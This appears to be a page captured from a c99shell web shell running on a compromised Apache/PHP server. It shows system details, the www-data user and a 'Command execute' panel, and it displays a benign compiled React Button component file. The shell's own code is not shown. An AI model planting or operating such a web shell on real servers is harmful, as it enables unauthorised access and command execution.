Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/wincloud_gateway/node_modules/@buffetjs/core/build/esm/components/Button/ drwxr-xr-x | |
| Viewing file: Select action/file-type: var _excluded = ["children", "color", "disabled", "icon", "label", "isLoading"];
function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }
function _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }
function _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }
/**
*
* Button
*
*/
import React from 'react';
import PropTypes from 'prop-types';
import { LoadingIndicator, Button as StyledButton, colors } from '@buffetjs/styles';
import { Plus } from '@buffetjs/icons';
import Flex from '../Flex';
import PrefixIcon from '../PrefixIcon';
function Button(_ref) {
var children = _ref.children,
color = _ref.color,
disabled = _ref.disabled,
icon = _ref.icon,
label = _ref.label,
isLoading = _ref.isLoading,
rest = _objectWithoutProperties(_ref, _excluded);
var content = label || children;
var img = icon === true ? /*#__PURE__*/React.createElement(Plus, {
height: "11px",
width: "11px",
fill: "".concat(colors.button[color].color)
}) : /*#__PURE__*/React.createElement(PrefixIcon, {
icon: icon
});
if (isLoading) {
return /*#__PURE__*/React.createElement(StyledButton, _extends({
color: color,
disabled: disabled
}, rest, {
onClick: function onClick(e) {
// Preventing the user from clicking the button when loading
e.preventDefault();
}
}), /*#__PURE__*/React.createElement(Flex, {
justifyContent: "space-around"
}, /*#__PURE__*/React.createElement(LoadingIndicator, {
animationTime: "0.6s",
borderWidth: "2px",
borderColor: "#f7f5f0",
borderTopColor: "#d1cec7",
size: "1.3rem"
})));
}
return /*#__PURE__*/React.createElement(StyledButton, _extends({
color: color,
disabled: disabled
}, rest), img, content);
}
Button.defaultProps = {
children: null,
color: 'primary',
disabled: false,
icon: false,
isLoading: false,
label: null,
type: 'button'
};
Button.propTypes = {
children: PropTypes.node,
color: PropTypes.oneOf(['primary', 'secondary', 'cancel', 'success', 'delete', 'none']),
disabled: PropTypes.bool,
icon: PropTypes.oneOfType([PropTypes.node, PropTypes.bool]),
isLoading: PropTypes.bool,
label: PropTypes.string,
type: PropTypes.oneOf(['submit', 'reset', 'button', 'menu'])
};
export default Button; |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]-- |